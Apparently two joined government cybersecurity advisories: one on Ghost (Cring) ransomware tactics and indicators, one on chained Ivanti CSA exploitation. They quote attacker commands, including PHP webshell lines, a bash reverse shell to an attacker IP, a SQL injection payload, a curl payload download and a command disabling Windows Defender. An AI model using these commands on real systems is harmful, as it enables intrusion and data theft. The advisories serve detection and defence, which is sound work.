Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.
The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.
Download the PDF version of this report:
AA25-050A #StopRansomware: Ghost (Cring) Ransomware
(PDF, 735.18 KB
)
For a downloadable copy of IOCs, see:
AA25-050A STIX XML
(XML, 78.67 KB
)
AA25-050A STIX XML (Additional IOCs)
(XML, 74.01 KB
)
AA25-050A STIX JSON
(JSON, 68.47 KB
)
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).
Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.
Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers.
Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].
Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.
See Table 1 for a descriptive listing of tools.
Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.
Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.
Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.
Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003].
This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.
In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.
Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data.
Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address.
For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.
Note: Table 2 contains a list of Ghost ransom email addresses.
Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.
These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].
The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.
Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.
Note: Authors of these tools generally state that they should not be used in illegal activity.
| Name | Description | Source |
|---|---|---|
| Cobalt Strike | Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike. | N/A |
| IOX | Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device. | github[.]com/EddieIvan01/iox |
| SharpShares.exe | SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery. | github[.]com/mitchmoser/SharpShares |
| SharpZeroLogon.exe | SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller. | github[.]com/leitosama/SharpZeroLogon |
| SharpGPPPass.exe | SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords. | N/A |
| SpnDump.exe | SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration. | N/A |
| NBT.exe | A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration. | github[.]com/BronzeTicket/SharpNBTScan |
| BadPotato.exe | BadPotato.exe is an exploitation tool used for privilege escalation. | github[.]com/BeichenDream/BadPotato |
| God.exe | God.exe is a compiled version of GodPotato and is used for privilege escalation. | github[.]com/BeichenDream/GodPotato |
| HFS (HTTP File Server) | A portable web server program that Ghost actors use to host files for remote access and exfiltration. | rejitto[.]com/hfs |
| Ladon 911 | A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144. | github[.]com/k8gege/Ladon |
| Web Shell | A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access. | Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx |
| File name | MD5 File Hash |
|---|---|
| Cring.exe | c5d712f82d5d37bb284acd4468ab3533 |
| Ghost.exe |
34b3009590ec2d361f07cac320671410 d9c019182d88290e5489cdf3b607f982 |
| ElysiumO.exe |
29e44e8994197bdb0c2be6fc5dfc15c2 c9e35b5c1dc8856da25965b385a26ec4 d1c5e7b8e937625891707f8b4b594314 |
| Locker.exe | ef6a213f59f3fbee2894bd6734bbaed2 |
| iex.txt, pro.txt (IOX) | ac58a214ce7deb3a578c10b97f93d9c3 |
| x86.log (IOX) |
c3b8f6d102393b4542e9f951c9435255 0a5c4ad3ec240fbfd00bdc1d36bd54eb |
| sp.txt (IOX) | ff52fdf84448277b1bc121f592f753c5 |
| main.txt (IOX) | a2fd181f57548c215ac6891d000ec6b9 |
| isx.txt (IOX) | 625bd7275e1892eac50a22f8b4a6355d |
| sock.txt (IOX) | db38ef2e3d4d8cb785df48f458b35090 |
Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.
| Email Addresses | ||
|---|---|---|
| asauribe@tutanota.com | ghostbackup@skiff.com | rainbowforever@tutanota.com |
| cringghost@skiff.com | ghosts1337@skiff.com | retryit1998@mailfence.com |
| crptbackup@skiff.com | ghosts1337@tuta.io | retryit1998@tutamail.com |
| d3crypt@onionmail.org | ghostsbackup@skiff.com | rsacrpthelp@skiff.com |
| d3svc@tuta.io | hsharada@skiff.com | rsahelp@protonmail.com |
| eternalnightmare@tutanota.com | just4money@tutanota.com | sdghost@onionmail.org |
| evilcorp@skiff.com | kellyreiff@tutanota.com | shadowghost@skiff.com |
| fileunlock@onionmail.org | kev1npt@tuta.io | shadowghosts@tutanota.com |
| fortihooks@protonmail.com | lockhelp1998@skiff.com | summerkiller@mailfence.com |
| genesis1337@tutanota.com | r.heisler@skiff.com | summerkiller@tutanota.com |
| ghost1998@tutamail.com | rainbowforever@skiff.com | webroothooks@tutanota.com |
Starting approximately in August 2024, Ghost actors began using TOX IDs in ransom notes as an alternative method for communicating with victims. For example: EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA and E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B.
See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, version 16.1, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Ghost actors exploit multiple vulnerabilities in public-facing systems to gain initial access to servers. |
| Technique Title | ID | Use |
|---|---|---|
| Windows Management Instrumentation | T1047 | Ghost actors abuse WMI to run PowerShell scripts on other devices, resulting in their infection with Cobalt Strike Beacon malware. |
| PowerShell | T1059.001 | Ghost actors use PowerShell for various functions including to deploy Cobalt Strike. |
| Windows Command Shell | T1059.003 | Ghost actors use the Windows Command Shell to download malicious content on to victim servers. |
| Technique Title | ID | Use |
|---|---|---|
| Account Manipulation | T1098 | Ghost actors change passwords for already established accounts. |
| Local Account | T1136.001 | Ghost actors create new accounts or makes modifications to local accounts. |
| Domain Account | T1136.002 | Ghost actors create new accounts or makes modifications to domain accounts. |
| Web Shell | T1505.003 | Ghost actors upload web shells to victim servers to gain access and for persistence. |
| Technique Title | ID | Use |
|---|---|---|
| Exploitation for Privilege Escalation | T1068 | Ghost actors use a suite of open source tools in an attempt to gain elevated privileges through exploitation of vulnerabilities. |
| Token Impersonation/Theft | T1134.001 | Ghost actors use Cobalt Strike to steal process tokens of processes running at a higher privilege. |
| Technique Title | ID | Use |
|---|---|---|
| Application Layer Protocol: Web Protocols | T1071.001 | Ghost actors use HTTP and HTTPS protocols while conducting C2 operations. |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Ghost actors disable antivirus products. |
| Hidden Window | T1564.003 | Ghost actors use PowerShell to conceal malicious content within legitimate appearing command windows. |
| Technique Title | ID | Use |
|---|---|---|
| OS Credential Dumping | T1003 | Ghost actors use Mimikatz and the Cobalt Strike “hashdump” command to collect passwords and password hashes. |
| Technique Title | ID | Use |
|---|---|---|
| Remote System Discovery | T1018 | Ghost actors use tools like Ladon 911 and ShapNBTScan for remote systems discovery. |
| Process Discovery | T1057 | Ghost actors run a ps command to list running processes on an infected device. |
| Domain Account Discovery | T1087.002 | Ghost actors run commands such as net group “Domain Admins” /domain to discover a list of domain administrator accounts. |
| Network Share Discovery | T1135 | Ghost actors use various tools for network share discovery for the purpose of host enumeration. |
| Software Discovery | T1518 | Ghost actors use their access to determine which antivirus software is running. |
| Security Software Discovery | T1518.001 | Ghost actors run Cobalt Strike to enumerate running antivirus software. |
| Technique Title | ID | Use |
|---|---|---|
| Exfiltration Over C2 Channel | T1041 | Ghost actors use both web shells and Cobalt Strike to exfiltrate limited data. |
| Exfiltration to Cloud Storage | T1567.002 | Ghost actors sometimes use legitimate cloud storage providers such as Mega.nz for malicious exfiltration operations. |
| Technique Title | ID | Use |
|---|---|---|
| Web Protocols | T1071.001 | Ghost actors use Cobalt Strike Beacon malware and Cobalt Strike Team Servers which communicate over HTTP and HTTPS. |
| Ingress Tool Transfer | T1105 | Ghost actors use Cobalt Strike Beacon malware to deliver ransomware payloads to victim servers. |
| Standard Encoding | T1132.001 | Ghost actors use PowerShell commands to encode network traffic which reduces their likelihood of being detected during lateral movement. |
| Encrypted Channel | T1573 | Ghost actors use encrypted email platforms to facilitate communications. |
| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | T1486 | Ghost actors use ransomware variants Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt victim files for ransom. |
| Inhibit System Recovery | T1490 | Ghost actors delete volume shadow copies. |
The FBI, CISA, and MS-ISAC recommend organizations reference their #StopRansomware Guide and implement the mitigations below to improve cybersecurity posture on the basis of the Ghost ransomware activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.
To get started:
Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators.
The FBI, CISA, and MS-ISAC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC.
February 19, 2025: Initial version.
Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.
According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.
All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]
Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]
According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.
According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.
The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.
In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression phpw{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.
After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].
In one confirmed compromise, the threat actors tried to create webshells using two different paths:
echo "<?php system(@$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.phpecho "<?php system('/bin/sudo '. @$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.phpIn the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.
In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.
In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].
In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.
After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.
After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.
According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.
The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.
This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.
This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.
See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.
Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
| File Name | IP Address | Description |
|---|---|---|
| “/client/index.php%3f.php/gsb/datetime.php | 142.171.217[.]195 | /var/log/messages |
| “/client/index.php%3f.php/gsb/datetime.php | 154.64.226[.]166 | /var/log/messages-20240904.gz |
| “/client/index.php%3f.php/gsb/datetime.php | 216.131.75[.]53 | |
| “/client/index.php%3f.php/gsb/datetime.php | 23.236.66[.]97 | /var/log/messages-20240905.gz |
| “/client/index.php%3f.php/gsb/datetime.php | 38.207.159[.]76 | /var/log/messages-20240906.gz |
| File Name | IP Address | Description |
|---|---|---|
| 149.154.167[.]41 | ||
| 95.161.76[.]100 | ||
| hxxps://file.io/E50vtqmJP5aa | ||
| hxxps://file.io/RBKuU8gicWt | ||
| hxxps://file.io/frdZ9L18R7Nx | ||
| hxxp://ip.sb | ||
|
hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis |
||
| 142.171.217[.]195 | ||
| 108.174.199[.]200 | ||
| 206.189.156[.]69 | ||
| 108.174.199[.]200/Xa27efd2.tmp | ||
| 142.171.217[.]195 |
| Type | IOC | Description |
|---|---|---|
| Ipv4 | 107.173.89[.]16 | |
| Ipv4 | 38.207.159[.]76 | |
| Ipv4 | 142.171.217[.]195 | |
| Ipv4 | 154.64.226[.]166 | |
| Ipv4 | 156.234.193[.]18 | |
| Ipv4 | 216.131.75[.]53 | |
| Ipv4 | 205.169.39[.]11 | |
| Ipv4 | 23.236.66[.]97 | |
| Ipv4 | 149.154.176[.]41 | |
| Ipv4 | 95.161.76[.]100 | |
| Ipv4 | 142.171.217[.]195 | |
| Ipv4 | 108.174.199[.]200 | |
| Ipv4 | 206.189.156[.]69 | |
| Ipv4 | 142.171.217[.]195 | |
| Ipv4 | 67.217.228[.]83 | |
| Ipv4 | 203.160.72[.]174 | |
| Ipv4 | 142.11.217[.]3 | |
| Ipv4 | 104.168.133[.]228 | |
| Ipv4 | 64.176.49[.]160 | |
| Ipv4 | 45.141.215[.]17 | |
| Ipv4 | 142.171.217[.]195 | |
| Ipv4 | 98.101.25[.]30 | |
| Ipv4 | 216.131.75[.]53 | |
| Ipv4 | 134.195.90[.]71 | |
| Ipv4 | 23.236.66[.]97 | |
| Hash | a50660fb31df96b3328640fdfbeea755 | |
| Hash | 53c5b7d124f13039eb62409e1ec2089d | |
| Hash | 698a752ec1ca43237cb1dc791700afde | |
| Hash | aa69300617faab4eb39b789ebfeb5abe | |
| Hash | c2becc553b96ba27d60265d07ec3bd6c | |
| Hash | cacc30e2a5b2683e19e45dc4f191cebc | /opt/ivanti/csa/broker/webroot/client/help.php |
| Hash | 061e5946c9595e560d64d5a8c65be49e | /opt/landesk/broker/webroot/gsb/view.php |
| Hash |
e35cf026057a3729387b7ecfb213ae 62a611f0f1a418876b11c9df3b56885bed |
/tmp/brokerdebug |
| Hash | c7d20ca6fe596009afaeb725fec8635f | /opt/landesk/broker/webroot/gsb/help.php |
| Hash | F7F81AE880A17975F60E1E0FE1A4048B | /opt/landesk/broker/webroot/gsb/DateTimeTab.php |
| Hash | 86B62FFD33597FD635E01B95F08BB996 | /opt/landesk/broker/webroot/gsb/style.php |
| Hash | DD975310201079CACD4CDE6FACAB8C1D | /opt/landesk/broker/webroot/client/index.php |
| Hash | 1B20E9310CA815F9E2BD366FB94E147F |
/sbin/systemd Configuration file at /WpService.conf |
| Hash | 30f57e14596f1bcad7cc4284d1af4684 |
/sbin/systemd Configuration file at /WpService.conf |
| URL | hxxps://file.io/E50vtqmJP5aa | |
| URL | hxxps://file.io/RBKuU8gicWt | |
| URL | hxxps://file.io/frdZ9L18R7Nx | |
| URL | hxxp://ip.sb | |
| URL |
hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis |
|
| URL | 108.174.199.200/Xa27efd2.tmp | |
| URL | 45.33.101.53/log | |
| URL | 45.33.101.53/log2 | |
| URL | 208.184.237.75/fdsupdate | |
| URL | 173.243.138.76/fdsupdate | |
| URL | cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun | |
| URL | cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun | |
| domain | gg.oyr2ohrm.eyes[.]sh | |
| domain | ggg.oyr2ohrm.eyes[.]sh | |
| domain | gggg.oyr2ohrm.eyes[.]sh | |
| domain | txt.xj[.]hk | |
| domain | book.hacktricks[.]xyz | |
| host | sh -c setsid /dev/shm/redis & | |
| host |
sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2 |
|
| host | sh -c mv /dev/shm/redis2 /dev/shm/redis | |
| host | sh -c rm /dev/shm/* | |
| host | rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis | |
| host | 78cc672218949a9ec87407ad3bcb5db6 | Agent.zip |
| host | d13f71e51b38ffef6b9dc8efbed27615 | Log.log |
| host | d88bfac2b43509abdc70308bef75e2a6 | Log.exe |
| host | R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) | R.exe |
| host | ae51c891d2e895b5ca919d14edd42c26 | CAService.exe |
| host | d88bfac2b43509abdc70308bef75e2a6 | Lgfxsys.exe |
| host | f82847bccb621e6822a3947bc9ce9621 | NetlO.cfg |
| host | c894f55c8fa9d92e2dd2c78172cff745 | XboVFyKw.tmp |
| host | MD5: Unknown | Wi.bat |
| host | MD5: Unknown | dCUgGXfm.tmp |
| host | MD5: Unknown | DijZViHC.tmp |
| CrowdStrike Falcon | e09fef2f502a41c199046219a6584e8d | CrowdStrike falcon cid |
| /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf | |
| /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini | |
| /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock –localtime –systohc | |
| /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool –fullList | |
| Ipv4 | 142.171.217[.]195 | |
| Ipv4 | 107.173.89[.]16 | |
| Ipv4 | 192.42.116[.]210 | |
| Ipv4 | 82.197.182[.]161 | |
| Ipv4 | 154.213.185[.]230 | |
| Ipv4 | 216.131.75[.]53 | |
| Ipv4 | 23.236.66[.]97 | |
| Ipv4 | 208.105.190[.]170 | |
| Ipv4 | 136.144.17[.]145 | |
| Ipv4 | 136.144.17[.]133 | |
| Ipv4 | 216.73.162[.]56 | |
| Ipv4 | 104.28.240[.]123 | |
| Ipv4 | 163.5.171[.]49 | |
| Ipv4 | 89.187.178[.]179 | |
| Ipv4 | 163.5.171[.]49 | |
| Ipv4 | 203.160.86[.]69 | |
